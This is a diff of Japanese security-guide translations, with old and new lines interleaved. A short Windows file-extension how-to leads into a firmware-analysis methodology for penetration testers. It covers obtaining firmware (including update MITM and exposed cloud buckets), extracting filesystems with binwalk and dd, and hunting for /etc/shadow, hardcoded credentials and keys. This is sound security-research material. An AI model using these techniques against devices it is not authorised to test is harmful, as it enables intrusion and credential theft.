6. 「既知のファイルの拡張子を非表示にする」の行を探し、その横のボックスをクリックしてチェックを外します。
|
||||
画面の右側にある「設定」行をクリックします。
|
||||
4. 画面の左側に「フォルダオプション」として可能な結果の一つが表示されます。それをクリックします。
|
||||
5. 「フォルダオプション」というタイトルのウィンドウが表示されます。そのダイアログボックスの上部にある「表示」タブをクリックします。
|
||||
6. 「登録されているファイルの種類の拡張子を隠す」という行を探し、その横にあるボックスのチェックを外します。
|
||||
7. 「OK」ボタンをクリックします。
|
||||
|
||||
## Windows 10でファイルの拡張子を表示する方法
|
||||
## Windows 10でファイル拡張子を表示する方法
|
||||
|
||||
1. 画面の下部にあるタスクバーのアイコンをクリックして、スタートメニューを呼び出します(アイコンはWindowsロゴの白いバージョンのものです)。
|
||||
2. 「folder options」と入力します(引用符なし)。画面には入力できる空白のフィールドはありませんが、入力することができます。単に入力します。
|
||||
3. 「Best match」リストに表示される「File Explorer Options」という項目をクリックします。
|
||||
4. 「File Explorer Options」というタイトルのダイアログボックスが表示されます。ウィンドウの上部にある「表示」タブをクリックします。
|
||||
5. 「既知のファイルの拡張子を非表示にする」の項目をスクロールして、その横のボックスをクリックしてチェックを外します。
|
||||
6. ダイアログボックスの下部にある「OK」ボタンをクリックします。
|
||||
1. 画面の下部にあるタスクバーのアイコンをクリックして、スタートメニューを呼び出します。(アイコンはWindowsロゴの白いバージョンのように見えるものです。)
|
||||
2. 「フォルダオプション」と入力します(引用符は不要です)。画面には何かを入力できることを示唆する空白のフィールドはありませんが、入力することができます。ただ入力してください。
|
||||
3. 表示される「ベストマッチ」リストの中から「ファイルエクスプローラーオプション」項目をクリックします。
|
||||
4. 「ファイルエクスプローラーオプション」というタイトルのダイアログボックスが表示されます。ウィンドウの上部にある「表示」タブをクリックします。
|
||||
5. 「登録されているファイルの種類の拡張子を隠す」という項目を探し、その横にあるボックスのチェックを外します。
|
||||
6. 「OK」ボタンをクリックします。
|
||||
|
||||
以上です。これで、Explorerウィンドウでファイルの真の拡張子を表示できるようになります。
|
||||
これで完了です。これで、エクスプローラーウィンドウのファイルの真の拡張子が表示されるようになります。
|
||||
|
||||
著作権©2008-2018 Christopher Heng。[https://www.howtohaven.com/](https://www.howtohaven.com)からさらに「How To」ガイドやチュートリアルを入手してください。
|
||||
Copyright © 2008-2018 by Christopher Heng. All rights reserved. 「How To」ガイドやチュートリアルをもっと見るには、[https://www.howtohaven.com/](https://www.howtohaven.com)をご覧ください。
|
||||
|
||||
**この記事は[**https://www.howtohaven.com/system/show-file-extensions-in-windows-explorer.shtml**](https://www.howtohaven.com/system/show-file-extensions-in-windows-explorer.shtml)で見つけることができます。**
|
||||
**この記事は** [**https://www.howtohaven.com/system/show-file-extensions-in-windows-explorer.shtml**](https://www.howtohaven.com/system/show-file-extensions-in-windows-explorer.shtml) **で見つけることができます。**
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||
<summary><strong>AWSハッキングをゼロからヒーローまで学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
- **サイバーセキュリティ会社**で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**最新バージョンのPEASSにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
HackTricksをサポートする他の方法:
|
||||
|
||||
- 独占的な[**NFT**](https://opensea.io/collection/the
|
||||
- **[💬](https://emojipedia.org/speech-balloon/)Discordグループ**に参加するか、[**テレグラムグループ**](https://t.me/peass)に参加するか、**Twitter**で私をフォローする[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
|
||||
|
||||
- **あなたのハッキングトリックを共有するには、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)にPRを提出してください**。
|
||||
* あなたの**会社をHackTricksに広告掲載したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください。
|
||||
* [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を入手する
|
||||
* 独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションである[**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見する
|
||||
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に**参加する**か、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)を**フォローする**。
|
||||
* **HackTricks**のGitHubリポジトリ[**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)にPRを提出して、あなたのハッキングのコツを共有する。
|
||||
|
||||
</details>
|
||||
```
|
||||
|
|
|
@ -1,73 +1,71 @@
|
|||
# ファームウェア分析
|
||||
# ファームウェア解析
|
||||
|
||||
<details>
|
||||
|
||||
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||
<summary><strong>AWSハッキングをゼロからヒーローまで学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
- **サイバーセキュリティ企業**で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
HackTricksをサポートする他の方法:
|
||||
|
||||
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を見つけてください。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
|
||||
|
||||
- [**公式のPEASS&HackTricksのグッズ**](https://peass.creator-spring.com)を手に入れましょう。
|
||||
|
||||
- [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter**で**フォロー**してください[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
|
||||
|
||||
- **ハッキングのトリックを共有するには、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出してください。
|
||||
* **HackTricksにあなたの会社を広告したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
* [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を入手する
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見する、私たちの独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクション
|
||||
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に**参加する**か、[**テレグラムグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)を**フォローする**。
|
||||
* **HackTricks**の[**GitHubリポジトリ**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)にPRを提出して、あなたのハッキングのコツを共有する。
|
||||
|
||||
</details>
|
||||
|
||||
## はじめに
|
||||
|
||||
ファームウェアは、デバイスのハードウェアコンポーネントに対する通信と制御を提供するソフトウェアの一種です。デバイスが実行する最初のコードです。通常、**オペレーティングシステムを起動**し、**さまざまなハードウェアコンポーネントとの通信**によってプログラムのための非常に特定のランタイムサービスを提供します。ほとんどの電子デバイスにはファームウェアがあります。
|
||||
ファームウェアは、デバイスのハードウェアコンポーネントを制御し、通信するためのソフトウェアの一種です。デバイスが実行する最初のコードです。通常、**オペレーティングシステムを起動**し、**様々なハードウェアコンポーネントと通信**することでプログラムのための非常に特定のランタイムサービスを提供します。ほとんどの電子デバイスにはファームウェアがあります。
|
||||
|
||||
デバイスは、ROM、EPROM、またはフラッシュメモリなどの**不揮発性メモリ**にファームウェアを格納します。
|
||||
デバイスはファームウェアを**不揮発性メモリ**に保存します。例えば、ROM、EPROM、フラッシュメモリなどです。
|
||||
|
||||
セキュリティの問題を多く発見できるため、ファームウェアを**調査**し、それを**変更**しようとすることが重要です。
|
||||
ファームウェアを**調査**し、それを**変更**しようとすることは重要です。なぜなら、このプロセス中に多くのセキュリティ問題を発見することができるからです。
|
||||
|
||||
## **情報収集と偵察**
|
||||
|
||||
この段階では、ターゲットに関するできるだけ多くの情報を収集し、その全体的な構成と基礎となる技術を理解するために必要な情報を収集しようとします。次の情報を収集しようとしてください。
|
||||
この段階では、ターゲットに関する可能な限り多くの情報を収集し、その全体的な構成と基盤となる技術を理解します。以下を収集しようと試みます:
|
||||
|
||||
* サポートされているCPUアーキテクチャ
|
||||
* サポートされるCPUアーキテクチャ
|
||||
* オペレーティングシステムプラットフォーム
|
||||
* ブートローダの設定
|
||||
* ブートローダーの設定
|
||||
* ハードウェアの回路図
|
||||
* データシート
|
||||
* コード行数(LoC)の推定
|
||||
* コード行数(LoC)の見積もり
|
||||
* ソースコードリポジトリの場所
|
||||
* サードパーティのコンポーネント
|
||||
* サードパーティコンポーネント
|
||||
* オープンソースライセンス(例:GPL)
|
||||
* 変更履歴
|
||||
* FCC ID
|
||||
* 設計およびデータフローダイアグラム
|
||||
* 設計とデータフロー図
|
||||
* 脅威モデル
|
||||
* 以前の侵入テストレポート
|
||||
* バグトラッキングチケット(例:Jira、BugCrowd、HackerOneなどのバグバウンティプラットフォーム)
|
||||
* 以前のペネトレーションテストレポート
|
||||
* バグ追跡チケット(例:Jira、バグバウンティプラットフォームのBugCrowdやHackerOne)
|
||||
|
||||
可能な限り、オープンソースインテリジェンス(OSINT)ツールと技術を使用してデータを取得します。オープンソースソフトウェアが使用されている場合は、リポジトリをダウンロードし、コードベースに対して手動および自動の静的解析を実行します。オープンソースソフトウェアプロジェクトでは、ベンダーが提供する無料の静的解析ツール([Coverity Scan](https://scan.coverity.com)や[Semmle’s LGTM](https://lgtm.com/#explore)など)を既に使用している場合があります。
|
||||
可能であれば、オープンソースインテリジェンス(OSINT)ツールと技術を使用してデータを取得します。オープンソースソフトウェアが使用されている場合は、リポジトリをダウンロードし、コードベースに対して手動および自動の静的解析を実行します。時々、オープンソースソフトウェアプロジェクトは、[Coverity Scan](https://scan.coverity.com)や[Semmle’s LGTM](https://lgtm.com/#explore)などのベンダーが提供する無料の静的解析ツールを既に使用しており、スキャン結果を提供しています。
|
||||
|
||||
## ファームウェアの取得
|
||||
|
||||
ファームウェアをダウンロードするためには、異なる難易度の方法があります。
|
||||
ファームウェアをダウンロードする方法は異なり、難易度も異なります
|
||||
|
||||
* 開発チーム、メーカー/ベンダー、またはクライアントから**直接**ダウンロードする
|
||||
* メーカーが提供する手順に従って**ゼロからビルド**する
|
||||
* ベンダーのサポートサイトから**ダウンロード**する
|
||||
* バイナリファイルの拡張子やDropbox、Box、Googleドライブなどのファイル共有プラットフォームに対して**Googleドーク**クエリを使用する
|
||||
* フォーラムやブログにコンテンツをアップロードする顧客からファームウェアイメージに出くわすことがよくあります。また、問題のトラブルシューティングのためにメーカーに問い合わせ、zipファイルやフラッシュドライブを送ってもらったことがある場合もあります。
|
||||
* 開発チーム、メーカー/ベンダー、またはクライアントから**直接**
|
||||
* メーカーが提供する手順に従って**ゼロからビルド**
|
||||
* ベンダーの**サポートサイト**から
|
||||
* Dropbox、Box、Googleドライブなどのファイル共有プラットフォームやバイナリファイル拡張子を対象とした**Googleドーク**クエリ
|
||||
* フォーラム、ブログ、またはメーカーに問題を解決するために連絡したサイトでコメントする顧客がコンテンツをアップロードすることで、ファームウェアイメージに遭遇することがよくあります。zipやフラッシュドライブで提供されます。
|
||||
* 例:`intitle:"Netgear" intext:"Firmware Download"`
|
||||
* [https://github.com/sa7mon/S3Scanner](https://github.com/sa7mon/S3Scanner)などのツールを使用して、Amazon Web Services(AWS)のS3バケットなどの公開されたクラウドプロバイダのストレージ場所からビルドをダウンロードする
|
||||
* **アップデート**時のデバイス間通信の**中間者攻撃**(MITM)
|
||||
* **UART**、**JTAG**、**PICit**などを介してハードウェアから直接抽出する
|
||||
* アップデートサーバリクエストのためのハードウェアコンポーネント内の**シリアル通信**をスニフィングする
|
||||
* モバイルアプリケーションや厚いアプリケーション内の**ハードコードされたエンドポイント**を介して
|
||||
* ブートローダ(例:U-boot)からフラッシュストレージまたは**tftp**を介してネットワーク経由でファームウェアを**ダンプ**する
|
||||
* オフライン分析とデータ抽出のために、ボードから**フラッシュチップ**(例:SPI)またはMCUを取り外す(最終手段)。
|
||||
* フラッシュストレージと/またはMCUのサポートされているチッププログラマが必要です。
|
||||
* Amazon Web Services(AWS)S3バケットなどの露出したクラウドプロバイダーのストレージ場所からビルドをダウンロードする(ツール例:[https://github.com/sa7mon/S3Scanner](https://github.com/sa7mon/S3Scanner))
|
||||
* **アップデート中の**デバイス通信を**中間者攻撃**(MITM)
|
||||
* **UART**、**JTAG**、**PICit**などを介して**ハードウェアから直接**抽出
|
||||
* ハードウェアコンポーネント内の**シリアル通信**をスニッフして**アップデートサーバーのリクエスト**を探る
|
||||
* モバイルまたは厚いアプリケーション内の**ハードコードされたエンドポイント**経由
|
||||
* **ブートローダー**(例:U-boot)からフラッシュストレージまたは**ネットワーク**経由で**tftp**を使用してファームウェアを**ダンプ**
|
||||
* オフライン分析とデータ抽出のために**フラッシュチップ**(例:SPI)またはMCUをボードから取り外す(最終手段)。
|
||||
* フラッシュストレージおよび/またはMCU用のサポートされているチッププログラマが必要です。
|
||||
|
||||
## ファームウェアの分析
|
||||
|
||||
これで、**ファームウェアを取得**したので、それに関する情報を抽出して、どのように扱うかを知る必要があります。そのために使用できるさまざまなツール:
|
||||
ファームウェアを**入手した**ので、それについての情報を抽出して、どのように扱うかを知る必要があります。それに使用できる異なるツール:
|
||||
```bash
|
||||
file <bin>
|
||||
strings -n8 <bin>
|
||||
|
@ -76,24 +74,24 @@ hexdump -C -n 512 <bin> > hexdump.out
|
|||
hexdump -C <bin> | head # might find signatures in header
|
||||
fdisk -lu <bin> #lists a drives partition and filesystems if multiple
|
||||
```
|
||||
もしもそれらのツールであまり情報を見つけられない場合は、`binwalk -E <bin>`コマンドで画像の**エントロピー**をチェックしてください。エントロピーが低い場合、暗号化されていない可能性が高いです。エントロピーが高い場合、暗号化されている可能性があります(または何らかの方法で圧縮されています)。
|
||||
以下のツールであまり情報が見つからない場合は、`binwalk -E <bin>`でイメージの**エントロピー**をチェックしてください。エントロピーが低ければ、暗号化されている可能性は低いです。エントロピーが高ければ、暗号化されている可能性が高いです(または何らかの方法で圧縮されています)。
|
||||
|
||||
さらに、次のツールを使用して**ファームウェアに埋め込まれたファイル**を抽出することができます:
|
||||
さらに、これらのツールを使用して**ファームウェア内に埋め込まれたファイル**を抽出することができます:
|
||||
|
||||
{% content-ref url="../../forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md" %}
|
||||
[file-data-carving-recovery-tools.md](../../forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md)
|
||||
{% endcontent-ref %}
|
||||
|
||||
または、[**binvis.io**](https://binvis.io/#/) ([code](https://code.google.com/archive/p/binvis/))を使用してファイルを検査することができます。
|
||||
または、ファイルを検査するために[**binvis.io**](https://binvis.io/#/)([コード](https://code.google.com/archive/p/binvis/))を使用できます。
|
||||
|
||||
### ファイルシステムの取得
|
||||
|
||||
以前にコメントされた`binwalk -ev <bin>`のようなツールを使用すると、**ファイルシステムを抽出**することができます。\
|
||||
通常、Binwalkは**ファイルシステムの種類と同じ名前のフォルダ**に抽出します。ファイルシステムの種類は通常、以下のいずれかです:squashfs、ubifs、romfs、rootfs、jffs2、yaffs2、cramfs、initramfs。
|
||||
先にコメントされたツール`binwalk -ev <bin>`を使用して、**ファイルシステムを抽出**できるはずです。\
|
||||
Binwalkは通常、squashfs、ubifs、romfs、rootfs、jffs2、yaffs2、cramfs、initramfsなど、**ファイルシステムのタイプと同じ名前のフォルダ**内に抽出します。
|
||||
|
||||
#### 手動でのファイルシステムの抽出
|
||||
#### 手動でのファイルシステム抽出
|
||||
|
||||
場合によっては、binwalkには**ファイルシステムのマジックバイトがシグネチャに含まれていない**ことがあります。この場合、binwalkを使用して**ファイルシステムのオフセットを見つけ、バイナリから圧縮されたファイルシステムを切り出し**、以下の手順に従ってファイルシステムを手動で抽出してください。
|
||||
時には、binwalkがそのシグネチャにファイルシステムの**マジックバイトを持っていない**ことがあります。そのような場合は、binwalkを使用してファイルシステムのオフセットを見つけ、バイナリから圧縮されたファイルシステムを**カービング**し、以下の手順に従ってファイルシステムのタイプに応じて**手動で抽出**します。
|
||||
```
|
||||
$ binwalk DIR850L_REVB.bin
|
||||
|
||||
|
@ -105,7 +103,7 @@ DECIMAL HEXADECIMAL DESCRIPTION
|
|||
1704052 0x1A0074 PackImg section delimiter tag, little endian size: 32256 bytes; big endian size: 8257536 bytes
|
||||
1704084 0x1A0094 Squashfs filesystem, little endian, version 4.0, compression:lzma, size: 8256900 bytes, 2688 inodes, blocksize: 131072 bytes, created: 2016-07-12 02:28:41
|
||||
```
|
||||
次の**ddコマンド**を実行して、Squashfsファイルシステムを切り出します。
|
||||
以下の**ddコマンド**を実行して、Squashfsファイルシステムを切り出します。
|
||||
```
|
||||
$ dd if=DIR850L_REVB.bin bs=1 skip=1704084 of=dir.squashfs
|
||||
|
||||
|
@ -115,25 +113,25 @@ $ dd if=DIR850L_REVB.bin bs=1 skip=1704084 of=dir.squashfs
|
|||
|
||||
8257536 bytes (8.3 MB, 7.9 MiB) copied, 12.5777 s, 657 kB/s
|
||||
```
|
||||
Alternatively, you can run the following command.
|
||||
以下のコマンドも実行可能です。
|
||||
|
||||
`$ dd if=DIR850L_REVB.bin bs=1 skip=$((0x1A0094)) of=dir.squashfs`
|
||||
|
||||
* For squashfs (used in the example above)
|
||||
* squashfsの場合(上記の例で使用)
|
||||
|
||||
`$ unsquashfs dir.squashfs`
|
||||
|
||||
Files will be in the "`squashfs-root`" directory afterwards.
|
||||
その後、ファイルは"`squashfs-root`"ディレクトリにあります。
|
||||
|
||||
* CPIO archive files
|
||||
* CPIOアーカイブファイル
|
||||
|
||||
`$ cpio -ivd --no-absolute-filenames -F <bin>`
|
||||
|
||||
* For jffs2 filesystems
|
||||
* jffs2ファイルシステムの場合
|
||||
|
||||
`$ jefferson rootfsfile.jffs2`
|
||||
|
||||
* For ubifs filesystems with NAND flash
|
||||
* NANDフラッシュを使用するubifsファイルシステムの場合
|
||||
|
||||
`$ ubireader_extract_images -u UBI -s <start_offset> <bin>`
|
||||
|
||||
|
@ -141,133 +139,85 @@ Files will be in the "`squashfs-root`" directory afterwards.
|
|||
|
||||
### ファイルシステムの分析
|
||||
|
||||
ファイルシステムを取得したら、以下のような悪いプラクティスを探すことができます。
|
||||
ファイルシステムを取得したら、以下のような悪い実践を探し始める時です:
|
||||
|
||||
* telnetdなどの**セキュリティの脆弱性のあるネットワークデーモン**(メーカーがバイナリの名前を変更して隠すこともあります)
|
||||
* **ハードコードされた認証情報**(ユーザー名、パスワード、APIキー、SSHキー、バックドアのバリエーションなど)
|
||||
* 古い**セキュリティが不十分なネットワークデーモン**(例えばtelnetd。時には製造業者がバイナリを変更して偽装することがあります)
|
||||
* **ハードコードされた認証情報**(ユーザー名、パスワード、APIキー、SSHキー、バックドアのバリエーション)
|
||||
* **ハードコードされたAPI**エンドポイントとバックエンドサーバーの詳細
|
||||
* エントリーポイントとして使用できる**アップデートサーバーの機能**
|
||||
* リモートコード実行のための**コンパイルされていないコードと起動スクリプトの確認**
|
||||
* **オフライン分析**のためにコンパイルされたバイナリの抽出
|
||||
* 攻撃の入り口として使用される可能性のある**アップデートサーバー機能**
|
||||
* リモートコード実行のための**未コンパイルのコードとスタートアップスクリプトのレビュー**
|
||||
* 今後のステップでディスアセンブラを使用してオフライン分析のために**コンパイルされたバイナリを抽出**
|
||||
|
||||
ファームウェア内で探すべき興味深いもの:
|
||||
ファームウェア内で探すべき**興味深いもの**:
|
||||
|
||||
* etc/shadowとetc/passwd
|
||||
* etc/sslディレクトリの一覧
|
||||
* etc/shadow と etc/passwd
|
||||
* etc/sslディレクトリのリストアップ
|
||||
* .pem、.crtなどのSSL関連ファイルの検索
|
||||
* 設定ファイルの検索
|
||||
* スクリプトファイルの検索
|
||||
* 他の.binファイルの検索
|
||||
* admin、password、remote、AWSキーなどのキーワードの検索
|
||||
* IoTデバイスで使用される一般的なWebサーバーの検索
|
||||
* IoTデバイスで使用される一般的なウェブサーバーの検索
|
||||
* ssh、tftp、dropbearなどの一般的なバイナリの検索
|
||||
* 禁止されたC関数の検索
|
||||
* 一般的なコマンドインジェクションの脆弱な関数の検索
|
||||
* コマンドインジェクションに弱い関数の検索
|
||||
* URL、メールアドレス、IPアドレスの検索
|
||||
* その他...
|
||||
* その他…
|
||||
|
||||
この種の情報を検索するツール(常に手動でファイルシステムの構造を確認し、ツールを使用して**隠されたもの**を見つけることができます):
|
||||
この種の情報を検索するツール(ファイルシステムの構造に慣れ、手動でチェックすることが常に重要ですが、ツールは**隠されたもの**を見つけるのに役立ちます):
|
||||
|
||||
* [**LinPEAS**](https://github.com/carlospolop/PEASS-ng)**:** ファイルシステム内の**機密情報**を検索するために便利な素晴らしいbashスクリプトです。ファームウェアファイルシステムに**chroot**して実行します。
|
||||
* [**Firmwalker**](https://github.com/craigz28/firmwalker)**:** 潜在的な機密情報を検索するためのbashスクリプト
|
||||
* [**The Firmware Analysis and Comparison Tool (FACT)**](https://github.com/fkie-cad/FACT\_core):
|
||||
* オペレーティングシステム、CPUアーキテクチャ、サードパーティのコンポーネントなどのソフトウェアコンポーネントの識別と関連するバージョン情報
|
||||
* イメージからのファームウェアファイルシステム(s)の抽出
|
||||
* 証明書と秘密鍵の検出
|
||||
* Common Weakness Enumeration(CWE)にマッピングされる弱い実装の検出
|
||||
* 脆弱性のフィードと署名に基づく検出
|
||||
* 基本的な静的行動分析
|
||||
* [**LinPEAS**](https://github.com/carlospolop/PEASS-ng)**:** ファイルシステム内の**機密情報**を検索するのに役立つ素晴らしいbashスクリプト。ファームウェアのファイルシステム内で**chrootして実行します**。
|
||||
* [**Firmwalker**](https://github.com/craigz28/firmwalker)**:** 潜在的に機密情報を検索するためのBashスクリプト
|
||||
* [**The Firmware Analysis and Comparison Tool (FACT)**](https://github.com/fkie-cad/FACT_core):
|
||||
* オペレーティングシステム、CPUアーキテクチャ、およびそれらの関連するバージョン情報などのソフトウェアコンポーネントの識別
|
||||
* イメージからのファームウェアファイルシステムの抽出
|
||||
* 証明書とプライベートキーの検出
|
||||
* Common Weakness Enumeration (CWE)にマッピングする弱い実装の検出
|
||||
* 脆弱性のフィード&シグネチャベースの検出
|
||||
* 基本的な静的な行動分析
|
||||
* ファームウェアバージョンとファイルの比較(diff)
|
||||
* QEMUを使用したファイルシステムバイナリのユーザーモードエミュレーション
|
||||
* NX、DEP、ASLR、スタックキャナリー、RELRO、FORTIFY\_SOURCEなどのバイナリの防御機能の検出
|
||||
* NX、DEP、ASLR、スタックカナリー、RELRO、FORTIFY_SOURCEなどのバイナリ軽減の検出
|
||||
* REST API
|
||||
* その他...
|
||||
* [**FwAnalyzer**](https://github.com/cruise-automation/fwanalyzer): FwAnalyzerは、設定可能なルールセットを使用して、(ext2/3/4)、FAT/VFat、SquashFS、UBIFSファイルシステムイメージ、cpioアーカイブ、およびディレクトリコンテンツを分析するツールです。
|
||||
* [**ByteSweep**](https://gitlab.com/bytesweep/bytesweep): 無料のIoTファームウェアセキュリティ分析ツール
|
||||
* [**FwAnalyzer**](https://github.com/cruise-automation/fwanalyzer): FwAnalyzerは、設定可能なルールを使用して(ext2/3/4)、FAT/VFat、SquashFS、UBIFSファイルシステムイメージ、cpioアーカイブ、およびディレクトリコンテンツを分析するツールです。
|
||||
* [**ByteSweep**](https://gitlab.com/bytesweep/bytesweep): 無料のソフトウェアIoTファームウェアセキュリティ分析ツール
|
||||
* [**ByteSweep-go**](https://gitlab.com/bytesweep/bytesweep-go): これは、元のByteSweepプロジェクトをGoで完全に書き直したものです。
|
||||
* [**EMBA**](https://github.com/e-m-b-a/emba): _EMBA_は、ペネトレーションテスター向けの中央ファームウェア分析ツールとして設計されています。_EMBA_は、ファームウェアの抽出プロセスから始まり、静的分析、エミュレーションを介した動的分析、最終的にはレポートの生成まで、セキュリティ分析プロセス全体をサポートします。_EMBA_は、ファームウェア内の可能な脆弱性や弱点を自動的に検出します。例としては、セキュリティの脆弱性のあるバイナリ、古くて非推奨のソフトウェアコンポーネント、潜在的に脆弱なスクリプトやハードコードされたパスワードなどがあります。
|
||||
* [**EMBA**](https://github.com/e-m-b-a/emba): _EMBA_は、ペネトレーションテスターのための中心的なファームウェア分析ツールとして設計されています。_ファームウェア抽出_プロセスから始まり、_静的分析_およびエミュレーションを介した_動的分析_を行い、最終的にレポートを生成します。_EMBA_は自動的にファームウェアの潜在的な弱点や脆弱性を発見します。例えば、セキュリティが不十分なバイナリ、古くて時代遅れのソフトウェアコンポーネント、潜在的に脆弱なスクリプト、ハードコードされたパスワードなどです。
|
||||
|
||||
{% hint style="warning" %}
|
||||
ファイルシステム内にはプログラムの**ソースコード**(常に**確認**する必要があります)だけでなく、**コンパイルされたバイナリ**も含まれている場合があります。これらのプログラムは何らかの形で公開されている可能性があり、潜在的な脆弱性を**逆コンパイル**して**確認**する必要があります。
|
||||
ファイルシステム内には、常に**チェック**すべきプログラムの**ソースコード**も見つかりますが、**コンパイルされたバイナリ**もあります。これらのプログラムは何らかの形で露出している可能性があり、潜在的な脆弱性をチェックするために**デコンパイル**して**チェック**する必要があります。
|
||||
|
||||
[**checksec.sh**](https://github.com/slimm609/checksec.sh)のようなツールは、保護されていないバイナリを見つけるのに役立ちます。Windowsバイナリの場合は、[**PESecurity**](https://github.com/NetSPI/PESecurity)を使用できます。
|
||||
{% endhint %}
|
||||
|
||||
## ファームウェアのエミュレーション
|
||||
|
||||
ファームウェアをエミュレートすることで、デバイスの**実行中**または**単一のプログラム**の**動的分析**を実行できます。
|
||||
ファームウェアをエミュレートするアイデアは、デバイス**実行中**または**単一プログラム**の**動的分析**を実行できるようにすることです。
|
||||
|
||||
{% hint style="info" %}
|
||||
ハードウェアやアーキテクチャの依存関係により、一部または完全なエミュレーションが**動作しない場合**があります。アーキテクチャとエンディアンが一致する場合、ラズベリーパイなどの所有しているデバイスにファームウェアのルートファイルシステムまたは特定のバイナリを転送してさらなるテストを行うことができます。この方法は、ターゲットと同じアーキテクチャとエンディアンを使用する事前にビルドされた仮想マシンにも適用されます。
|
||||
時には、ハードウェアやアーキテクチャの依存関係のために、部分的または完全なエミュレーションが**機能しないことがあります**。アーキテクチャとエンディアンがラズベリーパイなどの所有デバイスと一致する場合、ルートファイルシステムまたは特定のバイナリをデバイスに転送してさらにテストを行うことができます。この方法は、ターゲットと同じアーキテクチャとエンディアンを使用する事前に構築された仮想マシンにも適用されます。
|
||||
{% endhint %}
|
||||
|
||||
### バイナリのエミュレーション
|
||||
### バイナリエミュレーション
|
||||
|
||||
脆弱性を検索するために単一のプログラムをエミュレートしたい場合は、まずそのエンディアンとコンパイルされたCPUアーキテクチャを特定する必要があります。
|
||||
脆弱性を探すために単一のプログラムをエミュレートしたい場合、まずそのエンディアンとコンパイルされたCPUアーキテクチャを特定する必要があります。
|
||||
|
||||
#### MIPSの例
|
||||
```bash
|
||||
file ./squashfs-root/bin/busybox
|
||||
./squashfs-root/bin/busybox: ELF 32-bit MSB executable, MIPS, MIPS32 rel2 version 1 (SYSV), dynamically linked, interpreter /lib/ld-uClibc.so.0, stripped
|
||||
```
|
||||
今、**QEMU**を使用してbusybox実行ファイルを**エミュレート**することができます。
|
||||
Now you can **QEMU** を使用して busybox 実行ファイルを**エミュレート**することができます。
|
||||
```bash
|
||||
sudo apt-get install qemu qemu-user qemu-user-static qemu-system-arm qemu-system-mips qemu-system-x86 qemu-utils
|
||||
```
|
||||
実行可能ファイルは**MIPS**向けにコンパイルされており、**ビッグエンディアン**のバイト順序に従っているため、**`qemu-mips`**エミュレータを使用します。**リトルエンディアン**の実行可能ファイルをエミュレートする場合は、`el`サフィックスを持つエミュレータを選択する必要があります(`qemu-mipsel`)。
|
||||
実行ファイルが**MIPS**用にコンパイルされており、**big-endian**バイト順を採用しているため、QEMUの**`qemu-mips`**エミュレータを使用します。**little-endian**実行ファイルをエミュレートする場合は、`el`サフィックスが付いたエミュレータ(`qemu-mipsel`)を選択する必要があります:
|
